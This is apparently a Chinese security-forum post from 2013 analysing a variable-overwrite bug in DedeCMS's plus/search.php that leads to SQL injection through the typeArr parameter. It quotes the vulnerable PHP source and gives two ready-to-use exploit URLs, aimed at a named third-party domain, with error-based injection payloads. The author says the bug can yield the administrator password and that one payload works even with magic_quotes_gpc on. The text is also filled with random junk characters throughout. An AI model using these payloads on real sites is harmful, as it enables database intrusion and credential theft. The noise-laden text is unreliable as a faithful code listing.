微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.6 T2 V- J9 L: i0 Y* P
作者: c4rp3nt3r@0x50sec.org& S8 }8 M8 I; E1 v
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码., I% `' L0 _% v9 v
" U. j" N0 O" ]6 t5 t黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.) E' W4 C( W6 V+ [ G' a+ x% Z
4 v$ H! I$ m/ ?6 U/ X
============
( L# ~; f* g2 |: O! r' p $ Y% S+ Z5 P) W7 r! l4 V2 M R) B
& B8 p9 c! T8 e# i/ V0 x
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.6 {: D" q4 |4 n" ^
9 G* c: T* \8 m3 G) l; V
require_once(dirname(__FILE__).”/../include/common.inc.php”);
4 W& h7 E; W# E3 m9 Drequire_once(DEDEINC.”/arc.searchview.class.php”);. C$ _" W# D( |, W
. `/ M8 w7 `: H& C% {9 z
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
8 q2 S% X8 L% G* K; ]) J, T3 L$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
( v; l( l+ O, N: U" w$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;+ r" U" n$ A2 M6 o/ A
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
1 `- j7 A- `; K# ?( \1 D- O$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;) F0 ^+ T+ x: P$ t
: s+ g0 h! d3 B/ m$ h# \- S( C7 r
if(!isset($orderby)) $orderby=”;+ R d( {" U( e* Q
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);9 |: [( y! B: W$ H( M% R: p
7 A# J5 G* r0 S4 o5 {' L
8 \( K. _1 \7 D$ s/ sif(!isset($searchtype)) $searchtype = ‘titlekeyword’;' p8 f: r2 c& ~" F- t l$ t7 V' i4 }
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
8 ~+ ~; x+ ]" W$ x# _* C
/ k* L! X' p2 t" E* ?0 x% ]4 Iif(!isset($keyword)){
' i7 l- X4 o2 h; s* l if(!isset($q)) $q = ”;/ z; K L6 i0 q/ I/ y: D
$keyword=$q;
7 ?+ z0 b; R+ O0 K4 E6 \9 W' Q3 [}
' U: E6 f; u9 v4 s 1 [ p) U5 Q* d' v9 T& S
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
2 K! o! J S4 O' N
' |5 L/ P3 c' ]7 ]' n5 K( m//查找栏目信息" C0 Z9 M5 B& K# T! }
if(empty($typeid))
! f& F" g2 Z0 Y! S R$ o8 i{
/ T( ^; O# z: ^2 _' P $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
6 ^4 Q/ O% m; C# d if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ) w9 `' D. q1 z/ I
{
# W6 M- w/ ?% ? B0 z6 ] E% B $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);% c5 M. A# J4 \( a& d
fwrite($fp, “<”.”?php\r\n”);+ r' c5 S5 L. n- J& e. L6 {3 w) h
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);3 p8 D9 V2 R8 T% i) O* ^- @( x
$dsql->Execute();
) [ W" u. v) F) j: U# b2 q while($row = $dsql->GetArray()), o0 I; _" L$ |& \- D2 C
{) R0 J1 ]' E8 K
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
- h8 j+ N9 q+ f! B( G }
! y/ ~$ B g) p. I fwrite($fp, ‘?’.'>’);
' G4 _# {7 V- T/ o& R fclose($fp);
5 S8 C- M* c/ J! g, d9 p1 L }
4 F3 V, @9 {. P! g5 Z' u0 j5 a //引入栏目缓存并看关键字是否有相关栏目内容; t/ l" b7 R. s+ w
require_once($typenameCacheFile);9 W5 l/ {! Z, A7 {; W# ?1 e
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个$ {. j) z2 f- w% T8 f' A
//
% O) v; h( d/ z% q8 a8 Y if(isset($typeArr) && is_array($typeArr))# M2 W+ L, e# j' B
{( c) m' j( w+ h* J* w$ {2 ?$ }
foreach($typeArr as $id=>$typename)
2 {8 r3 n) M; Q$ y4 [6 Q {
3 T# ]5 V0 ^- Y & O& ?) F4 N9 {5 r y
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
' m! Y7 ~1 r v- S9 B if($keyword != $keywordn)$ f3 @2 l; u& {, l& \: X+ _: v
{
7 @' d9 c5 U2 C+ _ $keyword = $keywordn;
, ?5 |, ?) a" ^: P' y$ q <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
1 Z# C; H; `4 L } break;
4 q$ i8 k& u/ k u }0 T1 e9 l- D/ N: w1 o
}
0 I$ U) j$ |6 v2 _) g* z }3 d( Y% C9 `( w. w3 j
}
) U+ R( [, C/ Z- L然后plus/search.php文件下面定义了一个 Search类的对象 .3 v4 w. D' r M$ h, l
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.. _7 Y% ^$ E# c' j6 t2 K
$this->TypeLink = new TypeLink($typeid);
% i& t( V+ w7 V4 L5 \ # r5 x7 r9 Q4 b# C$ h$ T% P1 s
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.9 P$ W) i1 E }$ ~: _8 }
6 _( s5 F: K7 m" l9 F, Dclass TypeLink
5 M( r# w" J2 a; m3 B f& o/ I{
( y0 u, ?1 M% V0 L1 _3 J# G var $typeDir;1 l% U* C! z3 [7 c4 J, m
var $dsql;+ X2 ]; W1 r6 w2 V7 x- b
var $TypeID;0 `; B( B( j" @8 l: o( j7 P1 g
var $baseDir;
, p+ V) c4 v4 a+ T% u3 i$ i var $modDir;
' q8 l$ S0 v, [0 | var $indexUrl;
' V) r0 J8 n: V) J$ N% g3 Q var $indexName;
% v& H3 u9 g: E var $TypeInfos;. y3 f, j, o3 K/ ^7 p; X9 I
var $SplitSymbol;
0 H7 P7 c, C5 U* U% U3 b var $valuePosition;& a/ E4 R. Y9 D% `; u! x
var $valuePositionName;
+ P, Z4 |) z5 d4 t0 f/ a0 \, f$ i8 q8 M3 F var $OptionArrayList;//构造函数///////
6 g' X q0 a9 J) g4 x //php5构造函数
8 r1 D. H( H s5 ^7 y function __construct($typeid)
! v5 \6 T# l$ q4 d { a. k8 h/ c* c1 h( P1 }
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
I1 J4 w- X, P9 m' j0 E $this->indexName = $GLOBALS['cfg_indexname'];4 v- n8 \: m- H
$this->baseDir = $GLOBALS['cfg_basedir'];
# Y( `! T6 T, v: r7 A) } $this->modDir = $GLOBALS['cfg_templets_dir'];5 O( L1 ], S* _0 i! S
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
" D' v. W. e) v: b- X$ o $this->dsql = $GLOBALS['dsql'];4 Z' a$ p; Q) A0 s9 {( L1 f/ P
$this->TypeID = $typeid;
0 f3 G# J( Y- Q; q6 ]- j9 g $this->valuePosition = ”;" }1 K9 J; D: E1 a
$this->valuePositionName = ”;" \- Y* M5 g" o9 A
$this->typeDir = ”;7 v- i4 A) W5 |. p9 W% p& f% G2 E
$this->OptionArrayList = ”;
8 u: _& p8 h# a3 K2 c# \. k4 J+ B J5 s2 K: t. `) ]/ A8 y' P. F
//载入类目信息
- R# k( s- u: ]6 u
3 \; @* M% C2 ~& m. C' J <font color=”Red”>$query = “SELECT tp.*,ch.typename as
4 e; Q3 B: N; e( Dctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
2 w ?; I5 Y- P R9 I/ z) t`#@__channeltype` ch3 P- B. M) Q/ V. G! t+ \" d1 O" z8 R
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿5 |$ d5 s2 y$ c
. {+ i/ S: n; o9 P
if($typeid > 0); u2 a+ ^0 Y% g3 l1 E4 |- b" {7 c
{
" U, B/ k, U, p' {) V/ F $this->TypeInfos = $this->dsql->GetOne($query);
$ i, m# N* o1 @- _, D6 T利用代码一 需要 即使magic_quotes_gpc = Off& G5 z' r7 ?0 i: v; ]" O
' B, H9 N3 J" Nwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title7 T& H8 W$ ]0 @+ |" F1 l% \7 u5 j
2 [8 r" ]/ T0 \' ?; P. g
这只是其中一个利用代码… Search 类的构造函数再往下
' L; o- {7 ]8 [+ V; Q$ ~7 y . r T: ~, S* ^! v) {* V. T
……省略
6 Q0 l" m1 u: S; s5 B$this->TypeID = $typeid;6 z }; A: M; R, h
……省略
* n. m! {" l7 a6 oif($this->TypeID==”0″){
2 D& P7 P( C' z/ t3 x' @8 f $this->ChannelTypeid=1;9 _- c. i1 a0 h) M. ~
}else{4 @( ?* Q# m: v* ]$ Z
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲2 A: O5 b- r/ q$ o5 m7 B
//现在不鸡肋了吧亲…
+ N. B" l b( V; s; Y7 N $this->ChannelTypeid=$row['channeltype'];
. E9 i8 D5 F) V h3 j) M 7 h( ? |8 g8 K; s
}8 L4 L X0 f4 r
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
4 r: a/ ?1 I+ P1 z, {/ } 6 ?# V4 i- r9 q# j
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title: g9 J+ B7 g( o, z$ G
0 D+ y8 ~2 l; J如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
- \. a# d4 g1 p |
发表于 2013-1-19 08:18:56
收藏
支持
反对